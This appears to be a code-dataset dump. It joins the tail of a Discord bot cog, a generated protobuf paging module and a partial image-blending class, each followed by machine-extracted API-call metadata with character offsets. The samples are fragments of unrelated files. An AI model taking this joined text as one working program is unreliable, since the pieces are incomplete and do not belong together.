{online if v_status == 'Operational' else offline} **Voice:** {v_status}
{online if cf_status == 'Operational' else offline} **Cloudflare:** {cf_status}

__**Last outage information**__
**Incident:** {incident_icons.get(last_impact)} {last_incident}
**Status:** {online if last_status == 'Resolved' else offline} {last_status}
**Identified at:** {format_dt(last_created, style='F')}
**{'Resolved at' if last_status == 'Resolved' else 'Last updated'}:** {format_dt(last_update, style='F')}
            """, color=color)
        embed.set_footer(text="Powered by discordstatus.com")
        await ctx.respond(embed=embed)

    @topic.error
    @rule.error
    @poll.error
    @bypass.error
    @cve.error
    @dstatus.error
    @remindme.error
    @jumbo.error
    @avatar.error
    async def info_error(self, ctx: BlooContext, error):
        # Shared error handler: known user-facing errors are relayed
        # verbatim; anything else is logged with a traceback.
        if isinstance(error, discord.ApplicationCommandInvokeError):
            error = error.original

        if (isinstance(error, commands.MissingRequiredArgument)
            or isinstance(error, PermissionsFailure)
            or isinstance(error, commands.BadArgument)
            or isinstance(error, commands.BadUnionArgument)
            or isinstance(error, commands.MissingPermissions)
            or isinstance(error, commands.BotMissingPermissions)
            or isinstance(error, commands.MaxConcurrencyReached)
                or isinstance(error, commands.NoPrivateMessage)):
            await ctx.send_error(error)
        else:
            await ctx.send_error("A fatal error occured. Tell <@109705860275539968> about this.")
            logger.error(traceback.format_exc())
def setup(bot):
    """Extension entry point: attach the Misc cog to the bot."""
    misc_cog = Misc(bot)
    bot.add_cog(misc_cog)
| [
"discord.Color.blurple",
"discord.commands.user_command",
"discord.ext.commands.CooldownMapping.from_cooldown",
"utils.permissions.checks.whisper_in_general",
"io.BytesIO",
"utils.permissions.slash_perms.slash_perms.mod_and_up",
"data.services.guild_service.guild_service.get_guild",
"discord.utils.for... | [((4882, 4891), 'utils.permissions.checks.whisper', 'whisper', ([], {}), '()\n', (4889, 4891), False, 'from utils.permissions.checks import PermissionsFailure, mod_and_up, whisper, whisper_in_general\n'), ((4897, 5004), 'discord.commands.slash_command', 'slash_command', ([], {'guild_ids': '[cfg.guild_id]', 'description': '"""Send yourself a reminder after a given time gap"""'}), "(guild_ids=[cfg.guild_id], description=\n 'Send yourself a reminder after a given time gap')\n", (4910, 5004), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((6356, 6451), 'discord.commands.slash_command', 'slash_command', ([], {'guild_ids': '[cfg.guild_id]', 'description': '"""Post large version of a given emoji"""'}), "(guild_ids=[cfg.guild_id], description=\n 'Post large version of a given emoji')\n", (6369, 6451), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((7956, 7965), 'utils.permissions.checks.whisper', 'whisper', ([], {}), '()\n', (7963, 7965), False, 'from utils.permissions.checks import PermissionsFailure, mod_and_up, whisper, whisper_in_general\n'), ((7971, 8070), 'discord.commands.slash_command', 'slash_command', ([], {'guild_ids': '[cfg.guild_id]', 'description': '"""Get avatar of another user or yourself."""'}), "(guild_ids=[cfg.guild_id], description=\n 'Get avatar of another user or yourself.')\n", (7984, 8070), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((8574, 8583), 'utils.permissions.checks.whisper', 'whisper', ([], {}), '()\n', (8581, 8583), False, 'from utils.permissions.checks import PermissionsFailure, mod_and_up, whisper, whisper_in_general\n'), ((8589, 8647), 'discord.commands.user_command', 'user_command', ([], {'guild_ids': '[cfg.guild_id]', 'name': '"""View avatar"""'}), "(guild_ids=[cfg.guild_id], name='View avatar')\n", (8601, 8647), False, 'from discord.commands import Option, 
slash_command, message_command, user_command\n'), ((8773, 8782), 'utils.permissions.checks.whisper', 'whisper', ([], {}), '()\n', (8780, 8782), False, 'from utils.permissions.checks import PermissionsFailure, mod_and_up, whisper, whisper_in_general\n'), ((8788, 8849), 'discord.commands.message_command', 'message_command', ([], {'guild_ids': '[cfg.guild_id]', 'name': '"""View avatar"""'}), "(guild_ids=[cfg.guild_id], name='View avatar')\n", (8803, 8849), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((9943, 9963), 'utils.permissions.checks.whisper_in_general', 'whisper_in_general', ([], {}), '()\n', (9961, 9963), False, 'from utils.permissions.checks import PermissionsFailure, mod_and_up, whisper, whisper_in_general\n'), ((9969, 10057), 'discord.commands.slash_command', 'slash_command', ([], {'guild_ids': '[cfg.guild_id]', 'description': '"""View information about a CVE"""'}), "(guild_ids=[cfg.guild_id], description=\n 'View information about a CVE')\n", (9982, 10057), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((11393, 11413), 'utils.permissions.checks.whisper_in_general', 'whisper_in_general', ([], {}), '()\n', (11411, 11413), False, 'from utils.permissions.checks import PermissionsFailure, mod_and_up, whisper, whisper_in_general\n'), ((11419, 11532), 'discord.commands.slash_command', 'slash_command', ([], {'guild_ids': '[cfg.guild_id]', 'description': '"""Find out how to bypass jailbreak detection for an app"""'}), "(guild_ids=[cfg.guild_id], description=\n 'Find out how to bypass jailbreak detection for an app')\n", (11432, 11532), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((13104, 13199), 'discord.commands.slash_command', 'slash_command', ([], {'guild_ids': '[cfg.guild_id]', 'description': '"""Post the embed for one of the rules"""'}), "(guild_ids=[cfg.guild_id], description=\n 'Post the embed for one of the 
rules')\n", (13117, 13199), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((14146, 14233), 'discord.commands.slash_command', 'slash_command', ([], {'guild_ids': '[cfg.guild_id]', 'description': '"""Get the topic for a channel"""'}), "(guild_ids=[cfg.guild_id], description=\n 'Get the topic for a channel')\n", (14159, 14233), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((15038, 15050), 'utils.permissions.checks.mod_and_up', 'mod_and_up', ([], {}), '()\n', (15048, 15050), False, 'from utils.permissions.checks import PermissionsFailure, mod_and_up, whisper, whisper_in_general\n'), ((15810, 15913), 'discord.commands.slash_command', 'slash_command', ([], {'guild_ids': '[cfg.guild_id]', 'description': '"""View the status of various Discord features"""'}), "(guild_ids=[cfg.guild_id], description=\n 'View the status of various Discord features')\n", (15823, 15913), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((15914, 15935), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (15933, 15935), False, 'from discord.ext import commands\n'), ((4078, 4100), 'discord.Color.orange', 'discord.Color.orange', ([], {}), '()\n', (4098, 4100), False, 'import discord\n'), ((4552, 4628), 'discord.ext.commands.CooldownMapping.from_cooldown', 'commands.CooldownMapping.from_cooldown', (['(3)', '(15.0)', 'commands.BucketType.channel'], {}), '(3, 15.0, commands.BucketType.channel)\n', (4590, 4628), False, 'from discord.ext import commands\n'), ((5521, 5544), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (5542, 5544), False, 'import datetime\n'), ((5561, 5588), 'pytimeparse.parse', 'pytimeparse.parse', (['duration'], {}), '(duration)\n', (5578, 5588), False, 'import pytimeparse\n'), ((5904, 5943), 'discord.utils.escape_markdown', 'discord.utils.escape_markdown', (['reminder'], {}), '(reminder)\n', 
(5933, 5943), False, 'import discord\n'), ((9061, 9102), 'discord.Embed', 'discord.Embed', ([], {'title': 'f"""{member}\'s avatar"""'}), '(title=f"{member}\'s avatar")\n', (9074, 9102), False, 'import discord\n'), ((9702, 9724), 'discord.Color.random', 'discord.Color.random', ([], {}), '()\n', (9722, 9724), False, 'import discord\n'), ((15492, 15515), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (15513, 15515), False, 'import datetime\n'), ((3779, 3799), 'discord.Color.blue', 'discord.Color.blue', ([], {}), '()\n', (3797, 3799), False, 'import discord\n'), ((5057, 5116), 'discord.commands.Option', 'Option', (['str'], {'description': '"""What do you want to be reminded?"""'}), "(str, description='What do you want to be reminded?')\n", (5063, 5116), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((5128, 5194), 'discord.commands.Option', 'Option', (['str'], {'description': '"""When do we remind you? (i.e 1m, 1h, 1d)"""'}), "(str, description='When do we remind you? (i.e 1m, 1h, 1d)')\n", (5134, 5194), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((5633, 5718), 'discord.ext.commands.BadArgument', 'commands.BadArgument', (['"""Please give me a valid time to remind you! (i.e 1h, 30m)"""'], {}), "('Please give me a valid time to remind you! 
(i.e 1h, 30m)'\n )\n", (5653, 5718), False, 'from discord.ext import commands\n'), ((5753, 5786), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'delta'}), '(seconds=delta)\n', (5771, 5786), False, 'import datetime\n'), ((5828, 5884), 'discord.ext.commands.BadArgument', 'commands.BadArgument', (['"""Time has to be in the future >:("""'], {}), "('Time has to be in the future >:(')\n", (5848, 5884), False, 'from discord.ext import commands\n'), ((6786, 6811), 'data.services.guild_service.guild_service.get_guild', 'guild_service.get_guild', ([], {}), '()\n', (6809, 6811), False, 'from data.services.guild_service import guild_service\n'), ((7691, 7703), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (7701, 7703), False, 'import io\n'), ((7804, 7855), 'discord.File', 'discord.File', (['image_conatiner'], {'filename': '"""image.png"""'}), "(image_conatiner, filename='image.png')\n", (7816, 7855), False, 'import discord\n'), ((8119, 8194), 'discord.commands.Option', 'Option', (['discord.Member'], {'description': '"""User to get avatar of"""', 'required': '(False)'}), "(discord.Member, description='User to get avatar of', required=False)\n", (8125, 8194), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((11578, 11654), 'discord.commands.Option', 'Option', (['str'], {'description': '"""Name of the app"""', 'autocomplete': 'bypass_autocomplete'}), "(str, description='Name of the app', autocomplete=bypass_autocomplete)\n", (11584, 11654), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((11725, 11738), 'utils.autocompleters.get_ios_cfw', 'get_ios_cfw', ([], {}), '()\n', (11736, 11738), False, 'from utils.autocompleters import bypass_autocomplete, get_ios_cfw, rule_autocomplete\n'), ((11932, 12032), 'discord.ext.commands.BadArgument', 'commands.BadArgument', (['"""The API does not recognize that app or there are no bypasses available."""'], {}), "(\n 'The API does not 
recognize that app or there are no bypasses available.')\n", (11952, 12032), False, 'from discord.ext import commands\n'), ((12182, 12209), 'discord.ui.View', 'discord.ui.View', ([], {'timeout': '(30)'}), '(timeout=30)\n', (12197, 12209), False, 'import discord\n'), ((13245, 13288), 'discord.commands.Option', 'Option', (['str'], {'autocomplete': 'rule_autocomplete'}), '(str, autocomplete=rule_autocomplete)\n', (13251, 13288), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((13307, 13396), 'discord.commands.Option', 'Option', (['discord.Member'], {'description': '"""User to mention in the response"""', 'required': '(False)'}), "(discord.Member, description='User to mention in the response',\n required=False)\n", (13313, 13396), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((14282, 14374), 'discord.commands.Option', 'Option', (['discord.TextChannel'], {'description': '"""Channel to get the topic from"""', 'required': '(False)'}), "(discord.TextChannel, description='Channel to get the topic from',\n required=False)\n", (14288, 14374), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((14389, 14478), 'discord.commands.Option', 'Option', (['discord.Member'], {'description': '"""User to mention in the response"""', 'required': '(False)'}), "(discord.Member, description='User to mention in the response',\n required=False)\n", (14395, 14478), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((14608, 14664), 'discord.ext.commands.BadArgument', 'commands.BadArgument', (['f"""{channel.mention} has no topic!"""'], {}), "(f'{channel.mention} has no topic!')\n", (14628, 14664), False, 'from discord.ext import commands\n'), ((15229, 15318), 'discord.commands.Option', 'Option', (['discord.TextChannel'], {'required': '(False)', 'description': '"""Where to post the message"""'}), 
"(discord.TextChannel, required=False, description=\n 'Where to post the message')\n", (15235, 15318), False, 'from discord.commands import Option, slash_command, message_command, user_command\n'), ((15136, 15160), 'utils.permissions.slash_perms.slash_perms.mod_and_up', 'slash_perms.mod_and_up', ([], {}), '()\n', (15158, 15160), False, 'from utils.permissions.slash_perms import slash_perms\n'), ((15989, 16012), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (16010, 16012), False, 'import aiohttp\n'), ((16231, 16254), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (16252, 16254), False, 'import aiohttp\n'), ((17232, 17253), 'discord.Color.green', 'discord.Color.green', ([], {}), '()\n', (17251, 17253), False, 'import discord\n'), ((17297, 17319), 'discord.Color.orange', 'discord.Color.orange', ([], {}), '()\n', (17317, 17319), False, 'import discord\n'), ((6163, 6185), 'discord.Color.random', 'discord.Color.random', ([], {}), '()\n', (6183, 6185), False, 'import discord\n'), ((6843, 6884), 'utils.permissions.permissions.permissions.has', 'permissions.has', (['ctx.guild', 'ctx.author', '(5)'], {}), '(ctx.guild, ctx.author, 5)\n', (6858, 6884), False, 'from utils.permissions.permissions import permissions\n'), ((7050, 7102), 'discord.ext.commands.BadArgument', 'commands.BadArgument', (['"""This command is on cooldown."""'], {}), "('This command is on cooldown.')\n", (7070, 7102), False, 'from discord.ext import commands\n'), ((10347, 10370), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (10368, 10370), False, 'import aiohttp\n'), ((11343, 11386), 'discord.ext.commands.BadArgument', 'commands.BadArgument', (['"""Could not find CVE."""'], {}), "('Could not find CVE.')\n", (11363, 11386), False, 'from discord.ext import commands\n'), ((13702, 13821), 'discord.ext.commands.BadArgument', 'commands.BadArgument', (['"""Rule not found! 
Title must match one of the embeds exactly, use autocomplete to help!"""'], {}), "(\n 'Rule not found! Title must match one of the embeds exactly, use autocomplete to help!'\n )\n", (13722, 13821), False, 'from discord.ext import commands\n'), ((14948, 14968), 'discord.Color.blue', 'discord.Color.blue', ([], {}), '()\n', (14966, 14968), False, 'import discord\n'), ((15442, 15464), 'discord.Color.random', 'discord.Color.random', ([], {}), '()\n', (15462, 15464), False, 'import discord\n'), ((20166, 20188), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (20186, 20188), False, 'import traceback\n'), ((7505, 7560), 'discord.ext.commands.BadArgument', 'commands.BadArgument', (['"""Couldn\'t find a suitable emoji."""'], {}), '("Couldn\'t find a suitable emoji.")\n', (7525, 7560), False, 'from discord.ext import commands\n'), ((7626, 7658), 'base64.b64decode', 'base64.b64decode', (['emoji_url_file'], {}), '(emoji_url_file)\n', (7642, 7658), False, 'import base64\n'), ((12541, 12564), 'discord.Color.blurple', 'discord.Color.blurple', ([], {}), '()\n', (12562, 12564), False, 'import discord\n'), ((6228, 6268), 'discord.utils.format_dt', 'discord.utils.format_dt', (['time'], {'style': '"""R"""'}), "(time, style='R')\n", (6251, 6268), False, 'import discord\n'), ((7183, 7215), 'discord.ext.commands.PartialEmojiConverter', 'commands.PartialEmojiConverter', ([], {}), '()\n', (7213, 7215), False, 'from discord.ext import commands\n'), ((10420, 10475), 'yarl.URL', 'URL', (['f"""https://cve.circl.lu/api/cve/{id}"""'], {'encoded': '(True)'}), "(f'https://cve.circl.lu/api/cve/{id}', encoded=True)\n", (10423, 10475), False, 'from yarl import URL\n'), ((18945, 18979), 'discord.utils.format_dt', 'format_dt', (['last_created'], {'style': '"""F"""'}), "(last_created, style='F')\n", (18954, 18979), False, 'from discord.utils import format_dt\n'), ((19051, 19084), 'discord.utils.format_dt', 'format_dt', (['last_update'], {'style': '"""F"""'}), "(last_update, 
style='F')\n", (19060, 19084), False, 'from discord.utils import format_dt\n'), ((10646, 10668), 'discord.Color.random', 'discord.Color.random', ([], {}), '()\n', (10666, 10668), False, 'import discord\n')] |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: crud/Paging.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
# Default symbol database into which the generated message types are
# registered further below.
_sym_db = _symbol_database.Default()
# File descriptor for crud/Paging.proto.  `serialized_pb` holds the
# compiled binary form of the .proto definition (generated code — do not
# edit by hand; regenerate with protoc instead).
DESCRIPTOR = _descriptor.FileDescriptor(
    name="crud/Paging.proto",
    package="bluzelle.curium.crud",
    syntax="proto3",
    serialized_options=b"Z'github.com/bluzelle/curium/x/crud/types",
    create_key=_descriptor._internal_create_key,
    serialized_pb=b'\n\x11\x63rud/Paging.proto\x12\x14\x62luzelle.curium.crud"0\n\rPagingRequest\x12\x10\n\x08startKey\x18\x01 \x01(\t\x12\r\n\x05limit\x18\x02 \x01(\x04"0\n\x0ePagingResponse\x12\x0f\n\x07nextKey\x18\x01 \x01(\t\x12\r\n\x05total\x18\x02 \x01(\x04\x42)Z\'github.com/bluzelle/curium/x/crud/typesb\x06proto3',
)
# Message descriptor for PagingRequest (fields: startKey, limit).
# Generated by protoc — do not edit by hand.
_PAGINGREQUEST = _descriptor.Descriptor(
    name="PagingRequest",
    full_name="bluzelle.curium.crud.PagingRequest",
    filename=None,
    file=DESCRIPTOR,
    containing_type=None,
    create_key=_descriptor._internal_create_key,
    fields=[
        _descriptor.FieldDescriptor(
            name="startKey",
            full_name="bluzelle.curium.crud.PagingRequest.startKey",
            index=0,
            number=1,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=b"".decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
        _descriptor.FieldDescriptor(
            name="limit",
            full_name="bluzelle.curium.crud.PagingRequest.limit",
            index=1,
            number=2,
            type=4,
            cpp_type=4,
            label=1,
            has_default_value=False,
            default_value=0,
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
    ],
    extensions=[],
    nested_types=[],
    enum_types=[],
    serialized_options=None,
    is_extendable=False,
    syntax="proto3",
    extension_ranges=[],
    oneofs=[],
    serialized_start=43,
    serialized_end=91,
)
# Message descriptor for PagingResponse (fields: nextKey, total).
# Generated by protoc — do not edit by hand.
_PAGINGRESPONSE = _descriptor.Descriptor(
    name="PagingResponse",
    full_name="bluzelle.curium.crud.PagingResponse",
    filename=None,
    file=DESCRIPTOR,
    containing_type=None,
    create_key=_descriptor._internal_create_key,
    fields=[
        _descriptor.FieldDescriptor(
            name="nextKey",
            full_name="bluzelle.curium.crud.PagingResponse.nextKey",
            index=0,
            number=1,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=b"".decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
        _descriptor.FieldDescriptor(
            name="total",
            full_name="bluzelle.curium.crud.PagingResponse.total",
            index=1,
            number=2,
            type=4,
            cpp_type=4,
            label=1,
            has_default_value=False,
            default_value=0,
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
    ],
    extensions=[],
    nested_types=[],
    enum_types=[],
    serialized_options=None,
    is_extendable=False,
    syntax="proto3",
    extension_ranges=[],
    oneofs=[],
    serialized_start=93,
    serialized_end=141,
)
# Register the message descriptors on the file descriptor and build the
# concrete Python message classes via the reflection machinery.
DESCRIPTOR.message_types_by_name["PagingRequest"] = _PAGINGREQUEST
DESCRIPTOR.message_types_by_name["PagingResponse"] = _PAGINGRESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
# Concrete message class for bluzelle.curium.crud.PagingRequest.
PagingRequest = _reflection.GeneratedProtocolMessageType(
    "PagingRequest",
    (_message.Message,),
    {
        "DESCRIPTOR": _PAGINGREQUEST,
        "__module__": "crud.Paging_pb2"
        # @@protoc_insertion_point(class_scope:bluzelle.curium.crud.PagingRequest)
    },
)
_sym_db.RegisterMessage(PagingRequest)
# Concrete message class for bluzelle.curium.crud.PagingResponse.
PagingResponse = _reflection.GeneratedProtocolMessageType(
    "PagingResponse",
    (_message.Message,),
    {
        "DESCRIPTOR": _PAGINGRESPONSE,
        "__module__": "crud.Paging_pb2"
        # @@protoc_insertion_point(class_scope:bluzelle.curium.crud.PagingResponse)
    },
)
_sym_db.RegisterMessage(PagingResponse)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"google.protobuf.reflection.GeneratedProtocolMessageType",
"google.protobuf.symbol_database.Default",
"google.protobuf.descriptor.FieldDescriptor",
"google.protobuf.descriptor.FileDescriptor"
] | [((417, 443), 'google.protobuf.symbol_database.Default', '_symbol_database.Default', ([], {}), '()\n', (441, 443), True, 'from google.protobuf import symbol_database as _symbol_database\n'), ((459, 1006), 'google.protobuf.descriptor.FileDescriptor', '_descriptor.FileDescriptor', ([], {'name': '"""crud/Paging.proto"""', 'package': '"""bluzelle.curium.crud"""', 'syntax': '"""proto3"""', 'serialized_options': 'b"Z\'github.com/bluzelle/curium/x/crud/types"', 'create_key': '_descriptor._internal_create_key', 'serialized_pb': 'b\'\\n\\x11crud/Paging.proto\\x12\\x14bluzelle.curium.crud"0\\n\\rPagingRequest\\x12\\x10\\n\\x08startKey\\x18\\x01 \\x01(\\t\\x12\\r\\n\\x05limit\\x18\\x02 \\x01(\\x04"0\\n\\x0ePagingResponse\\x12\\x0f\\n\\x07nextKey\\x18\\x01 \\x01(\\t\\x12\\r\\n\\x05total\\x18\\x02 \\x01(\\x04B)Z\\\'github.com/bluzelle/curium/x/crud/typesb\\x06proto3\''}), '(name=\'crud/Paging.proto\', package=\n \'bluzelle.curium.crud\', syntax=\'proto3\', serialized_options=\n b"Z\'github.com/bluzelle/curium/x/crud/types", create_key=_descriptor.\n _internal_create_key, serialized_pb=\n b\'\\n\\x11crud/Paging.proto\\x12\\x14bluzelle.curium.crud"0\\n\\rPagingRequest\\x12\\x10\\n\\x08startKey\\x18\\x01 \\x01(\\t\\x12\\r\\n\\x05limit\\x18\\x02 \\x01(\\x04"0\\n\\x0ePagingResponse\\x12\\x0f\\n\\x07nextKey\\x18\\x01 \\x01(\\t\\x12\\r\\n\\x05total\\x18\\x02 \\x01(\\x04B)Z\\\'github.com/bluzelle/curium/x/crud/typesb\\x06proto3\'\n )\n', (485, 1006), True, 'from google.protobuf import descriptor as _descriptor\n'), ((4611, 4759), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', (['"""PagingRequest"""', '(_message.Message,)', "{'DESCRIPTOR': _PAGINGREQUEST, '__module__': 'crud.Paging_pb2'}"], {}), "('PagingRequest', (_message.Message\n ,), {'DESCRIPTOR': _PAGINGREQUEST, '__module__': 'crud.Paging_pb2'})\n", (4651, 4759), True, 'from google.protobuf import reflection as _reflection\n'), ((4932, 5087), 
'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', (['"""PagingResponse"""', '(_message.Message,)', "{'DESCRIPTOR': _PAGINGRESPONSE, '__module__': 'crud.Paging_pb2'}"], {}), "('PagingResponse', (_message.\n Message,), {'DESCRIPTOR': _PAGINGRESPONSE, '__module__': 'crud.Paging_pb2'}\n )\n", (4972, 5087), True, 'from google.protobuf import reflection as _reflection\n'), ((1895, 2288), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""limit"""', 'full_name': '"""bluzelle.curium.crud.PagingRequest.limit"""', 'index': '(1)', 'number': '(2)', 'type': '(4)', 'cpp_type': '(4)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR', 'create_key': '_descriptor._internal_create_key'}), "(name='limit', full_name=\n 'bluzelle.curium.crud.PagingRequest.limit', index=1, number=2, type=4,\n cpp_type=4, label=1, has_default_value=False, default_value=0,\n message_type=None, enum_type=None, containing_type=None, is_extension=\n False, extension_scope=None, serialized_options=None, file=DESCRIPTOR,\n create_key=_descriptor._internal_create_key)\n", (1922, 2288), True, 'from google.protobuf import descriptor as _descriptor\n'), ((3593, 3987), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""total"""', 'full_name': '"""bluzelle.curium.crud.PagingResponse.total"""', 'index': '(1)', 'number': '(2)', 'type': '(4)', 'cpp_type': '(4)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR', 'create_key': '_descriptor._internal_create_key'}), "(name='total', 
full_name=\n 'bluzelle.curium.crud.PagingResponse.total', index=1, number=2, type=4,\n cpp_type=4, label=1, has_default_value=False, default_value=0,\n message_type=None, enum_type=None, containing_type=None, is_extension=\n False, extension_scope=None, serialized_options=None, file=DESCRIPTOR,\n create_key=_descriptor._internal_create_key)\n", (3620, 3987), True, 'from google.protobuf import descriptor as _descriptor\n')] |
# -*- coding: utf-8 -*-
""" BLEND
This module defines classes and methods for blending images.
:Author: <NAME> <<EMAIL>>
"""
import numpy as np
from lmfit import Model
from lmfit.models import GaussianModel, ConstantModel
from modopt.base.np_adjust import pad2d
from sf_tools.image.stamp import postage_stamp
from sf_tools.image.distort import recentre
class Blender(object):
    """Blend pairs of images into single postage stamps.

    The input sample is split in half: the first half are treated as
    "central" objects and the second half as "companions".  Each
    central/companion pair is combined into one blended stamp using one of
    two methods:

    * ``'sf'``    : fit a 1D Gaussian to each image's axis profiles,
                    recentre both images, then add the companion at a random
                    offset scaled by the fitted widths.
    * ``'xwang'`` : pad the central image into a larger frame and add the
                    companion at a randomly drawn position inside (or, when
                    ``overlap`` is False, outside) a box around the centre.

    Parameters
    ----------
    images : numpy.ndarray
        Stack of input images; if the sample size is odd the last image is
        dropped so the sample splits evenly.
    ratio : float, optional
        Scaling applied to the combined fitted widths when drawing the
        random offset ('sf' method only).
    overlap : bool, optional
        If True the companion is allowed to overlap the central object.
    stamp_shape : tuple, optional
        Shape of the output postage stamps.
    method : str, optional
        Blending method, either 'sf' or 'xwang'.
    xwang_sigma : float, optional
        Box-size scaling factor for the 'xwang' method.
    seed : int, optional
        Random seed used when drawing shifts ('sf' method only).

    Raises
    ------
    ValueError
        If ``method`` is neither 'sf' nor 'xwang'.
    """

    def __init__(self, images, ratio=1.0, overlap=True, stamp_shape=(116, 116),
                 method='sf', xwang_sigma=0.15, seed=None):

        self.ratio = ratio
        self.overlap = overlap
        self.stamp_shape = np.array(stamp_shape)
        if method in ('sf', 'xwang'):
            self.method = method
        else:
            raise ValueError('Method must be "sf" or "xwang".')
        self.xwang_sigma = xwang_sigma
        self.seed = seed

        # Drop the last image so the sample splits evenly into two halves.
        if images.shape[0] % 2:
            images = images[:-1]
        half_sample = images.shape[0] // 2
        self._images = images
        self._centrals = images[:half_sample]
        self._companions = images[half_sample:]
        self.obj_centres = []

    @staticmethod
    def _fit_gauss(xval, yval):
        """Fit a 1D Gaussian model to the profile ``yval`` sampled at ``xval``."""

        model = GaussianModel()
        result = model.fit(yval, model.guess(yval, x=xval,
                           amplitude=np.max(yval)), x=xval)

        return result

    @classmethod
    def _fit_image(cls, image):
        """Estimate an image's centre and width from Gaussian fits.

        Fits the summed x- and y-profiles independently and returns the
        fitted centre ``(x, y)`` (as ints) and the smaller of the two FWHMs.
        """

        sum_x = image.sum(axis=0)
        sum_y = image.sum(axis=1)
        x_vals = np.arange(sum_x.size)
        sum_x_fit = cls._fit_gauss(x_vals, sum_x)
        sum_y_fit = cls._fit_gauss(x_vals, sum_y)
        centre = (int(sum_x_fit.params['center'].value),
                  int(sum_y_fit.params['center'].value))
        width = min(sum_x_fit.params['fwhm'].value,
                    sum_y_fit.params['fwhm'].value)

        return centre, width

    @staticmethod
    def _random_shift(radius, outer_radius=None, seed=None):
        """Draw a random integer (x, y) shift.

        The shift is drawn uniformly in angle; its length lies within
        ``radius``, or in the annulus ``[radius, outer_radius]`` when
        ``outer_radius`` is given.
        """

        if seed:
            np.random.seed(seed)
        theta = np.random.ranf() * 2 * np.pi
        if outer_radius:
            r = radius + np.random.ranf() * (outer_radius - radius)
        else:
            r = np.random.ranf() * radius
        x = int(np.around(r * np.cos(theta)))
        y = int(np.around(r * np.sin(theta)))

        return x, y

    @staticmethod
    def _pad_image_shift(image, shift):
        """Zero-pad ``image`` on the side(s) indicated by the signs of ``shift``."""

        pad = [(_shift, 0) if _shift >= 0 else (0, -_shift)
               for _shift in shift]

        return np.pad(image, pad, 'constant')

    @classmethod
    def _blend(cls, image1, image2, shift):
        """Add ``image2``, offset by ``shift``, onto ``image1``."""

        dim = image1.shape
        image2 = cls._pad_image_shift(image2, shift)
        # Crop the shifted companion back to image1's frame before adding.
        image2 = image2[:dim[0]] if shift[0] >= 0 else image2[-shift[0]:]
        image2 = image2[:, :dim[1]] if shift[1] >= 0 else image2[:, -shift[1]:]

        return image1 + image2

    @staticmethod
    def _gal_size_xwang(image):
        """Return the extent of the non-zero signal along each axis."""

        return np.array([np.count_nonzero(image.sum(axis=ax))
                         for ax in range(2)])

    @staticmethod
    def _area_prob(shape1, shape2):
        """Probabilities of the four sectors around a central box.

        ``shape1`` is the full frame, ``shape2`` the excluded central box;
        the returned four probabilities are proportional to the sector areas
        and sum to one.
        """

        shape1, shape2 = np.array(shape1), np.array(shape2)
        area = np.prod(shape1) - np.prod(shape2)
        shape_diff = (shape1 - shape2) // 2
        prob_ab = shape_diff[1] * shape1[0] / area
        prob_cd = 0.5 - prob_ab

        return prob_ab, prob_ab, prob_cd, prob_cd

